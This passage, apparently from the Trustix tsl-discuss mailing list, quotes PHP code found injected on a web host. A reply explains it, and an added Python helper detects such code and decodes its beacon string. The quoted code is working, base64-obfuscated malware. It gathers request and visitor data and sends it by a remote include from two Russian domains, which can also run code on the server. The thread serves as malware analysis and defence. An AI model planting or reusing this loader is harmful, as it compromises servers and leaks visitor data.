Barbara M. wrote:
> <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? 
> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? 
> $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) 
> ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) 
> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? 
> $_SERVER["QUERY_STRING"] : 
> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? 
> $_SERVER["HTTP_REFERER"] : 
> $HTTP_REFERER);$g=(isset($_SERVER['HTTP_USER_AGENT']) ? 
> $_SERVER['HTTP_USER_AGENT'] : 
> $HTTP_USER_AGENT);$h=(isset($_SERVER['REMOTE_ADDR']) ? 
> $_SERVER['REMOTE_ADDR'] : 
> $REMOTE_ADDR);$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
>  
> if 
> ((include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjkubXNodG1sLnJ1')."/?".$str))){}
>  
> else 
> {include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjcuaHRtbHRh
>   Z3MucnU=')."/?".$str);} ?>

let's pick this apart...
first, it disables error reporting, then it sets some vars to various 
predefined vars (from apache/php);
$a: HTTP_HOST    (the virtualhost)
$b: SERVER_NAME  (the "primary" hostname)
$c: REQUEST_URI  (the uri requested (/foo/bar/baz.php/bleh?a=2))
$d: PHP_SELF     (name of php file being executed)
$e: QUERY_STRING (part of url following '?')
$f: HTTP_REFERER (url that linked to the script)
$g: HTTP_USER_AGENT (you know this one, right? ;)
$h: REMOTE_ADDR  (IP of client)

then, it base64-encodes these values
(i.e. 62.101.244.10 becomes NjIuMTAxLjI0NC4xMA==)
into the variable $str
then it includes http://user9.mshtml.ru/?<captured data>
or if that fails, it includes http://user7.htmltags.ru/?<captured data>

at which point, the server would execute whatever php code one (or both) 
of those servers would return, if http fopen wrappers are enabled for 
the server (i.e. safemode is off)

> 
> Any idea on what this code is?
> The vhost owner says they aren't the author.

did that clarify?

Cheers,
-- 
Morten
_______________________________________________
tsl-discuss mailing list
tsl-discuss@lists.trustix.org
http://lists.trustix.org/mailman/listinfo/tsl-discuss
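
A triage helper for the pattern picked apart in the reply above, as an added example that is not part of the original thread: it flags `include`/`require` calls whose target is assembled from `base64_decode()` literals and decodes the dot-joined beacon string back into its eight fields. The function names, the sample host `c2.example.invalid` and the sample request values are assumptions constructed for illustration.

```python
import base64
import re

# Field order used by the injected snippet ($a..$h in the reply above).
FIELDS = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
          "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR"]

B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[\s(]*((?:base64_decode\([^)]*\)\s*\.?\s*)+)",
    re.I)

def b64_text(s):
    # Mail or editor line wrapping can split a literal; drop whitespace first.
    return base64.b64decode("".join(s.split())).decode("utf-8", "replace")

def enc(s):
    return base64.b64encode(s.encode()).decode()

def remote_includes(php_source):
    """Return URLs that include/require builds from base64_decode() literals."""
    hits = []
    for m in INCLUDE.finditer(php_source):
        url = "".join(b64_text(lit) for _, lit in B64_CALL.findall(m.group(1)))
        if re.match(r"(?i)(https?|ftp)://", url):
            hits.append(url)
    return hits

def decode_beacon(query):
    """Split the '.'-joined base64 query string back into named fields."""
    parts = query.lstrip("?").split(".")  # '.' is not in the base64 alphabet
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return {name: b64_text(p) for name, p in zip(FIELDS, parts)}

# Constructed sample in the same shape as the quoted snippet; host is a placeholder.
SAMPLE_PHP = ("<? if ((include(base64_decode('%s').base64_decode('%s')"
              ".\"/?\".$str))){} ?>" % (enc("http://"), enc("c2.example.invalid")))
# Constructed request values; an empty Referer encodes to an empty field.
SAMPLE_QUERY = ".".join(enc(v) for v in [
    "www.example.test", "example.test", "/index.php?a=2", "/index.php",
    "a=2", "", "Mozilla/5.0", "192.0.2.10"])

if __name__ == "__main__":
    print(remote_includes(SAMPLE_PHP))
    for name, value in decode_beacon(SAMPLE_QUERY).items():
        print("%-16s %r" % (name, value))
```

Run `remote_includes()` over each `.php` file under the docroot to find other injected copies, and `decode_beacon()` over the query string of matching outbound requests in proxy logs to see what was sent.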
